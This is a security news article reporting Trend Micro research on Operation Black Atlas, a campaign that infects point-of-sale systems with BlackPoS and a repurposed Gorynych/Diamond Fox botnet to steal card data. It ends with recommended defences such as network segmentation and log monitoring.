Security Experts:

Connect with us

Hi, what are you looking for?



Operation Black Atlas Continues to Compromise PoS Systems

Operation Black Atlas, a campaign aimed at infecting point of sale (PoS) systems around the world, has managed to infect more companies and is using the modular Gorynych/Diamond Fox botnet to exfiltrate data, Trend Micro researchers warn.

Operation Black Atlas, a campaign aimed at infecting point of sale (PoS) systems around the world, has managed to infect more companies and is using the modular Gorynych/Diamond Fox botnet to exfiltrate data, Trend Micro researchers warn.

Earlier this month, the security company revealed that cybercriminals were using multiple tools to compromise businesses that use card payment systems, including those in healthcare and retail, and to infect targeted systems with various PoS malware, including the BlackPOS malware.

Trend Micro said the cybercriminals behind Operation Black Atlas are using a variety of pen testing tools to discover vulnerable systems, including brute force or dictionary attack tools, SMTP (Simple Mail Transfer Protocol) scanners, and remote desktop viewers. They used a “shotgun” approach to infiltrate networks by checking available ports on the Internet on multiple targets at once, the researches said.

The operation was focused on spreading a variety of malware, including BlackPoS, also known as Kaptoxa, while the masterminds behind it were also looking to steal user credentials to sites that contain sensitive information, email accounts, and Facebook. The operation is aimed at small and medium-sized businesses across the globe, and appears to be successfully infecting targets across a variety of industries.

Most recently, the infection spread to a multi-state healthcare provider, dental clinics, a machine manufacturer, a technology company focusing on insurance services, a gas station that has a multi-state presence, and a beauty supply shop, Trend Micro said in a new blog post on the operation.

The security company also explains that the cybercriminals behind Black Atlas introduce PoS threats in the compromised systems by abusing a legitimate function, the Windows Background Intelligent Transfer Service (BITS) or bitsadmin.exe. The function is used for transferring files to and from Microsoft and is mostly used for system updates, as it can easily bypass firewalls.

As part of this operation, bad actors use BITS to download NewPOSThings, a piece of malware that includes functions such as RAM scraper, keylogger, keep-alive reporting, and data transfer routines. Moreover, they load a variant of Neutrino or Kasidet, also with PoS card-scraping functionality, as well as CenterPOS, Project Hook, and PwnPOS in some cases.

The cybercriminals running Black Atlas also managed to build a replica of the Gorynych / Diamond Fox botnet malware and repurposed it to specifically look for the output file of the BlackPoS malware, which includes harvested credit card data. The modular botnet also includes plugins for getting screenshots, passwords, mails, and more.

The security researchers explain that Gorynych routines focus mainly on anti-analysis, information theft, and installations, and that the plugins provide it with increased functionality. The Diamond Fox builder has the keylogger and PoS grabber functionalities disabled by default, but they have been turned on as part of operation Black Atlas.

After infection, Gorynych downloads its plugins and reports to its server via gate.php using HTTP POST, while using its own user-agent that can be found in the configuration file. The information is encrypted using a simple XOR operation, Trend Micro explained. The security researchers also managed to extract hashes, addresses, and other indicators related to Gorynych and included them an IOC document, and offer details on the entire operation Black Atlas in a technical brief.

The security firm notes that companies threatened by this operation should assess their security posture and apply multiple PoS strategies, with network segmentation and isolation of cardholder data environment from other networks considered a standard approach. Large organizations should eliminate unnecessary data and monitor the remaining information, while also ensuring that essential controls are running via regular security checks and that event logs are monitored as well.


Written By

Click to comment

Expert Insights

Related Content


Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.


The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.


Video games developer Riot Games says source code was stolen from its development environment in a ransomware attack


Artificial intelligence is competing in another endeavor once limited to humans — creating propaganda and disinformation.


A new study by McAfee and the Center for Strategic and International Studies (CSIS) named a staggering figure as the true annual cost of...


A digital ad fraud scheme dubbed "VastFlux" spoofed over 1,700 apps and peaked at 12 billion ad requests per day before being shut down.


Cybercriminals earned significantly less from ransomware attacks in 2022 compared to 2021 as victims are increasingly refusing to pay ransom demands.


The FBI dismantled the network of the prolific Hive ransomware gang and seized infrastructure in Los Angeles that was used for the operation.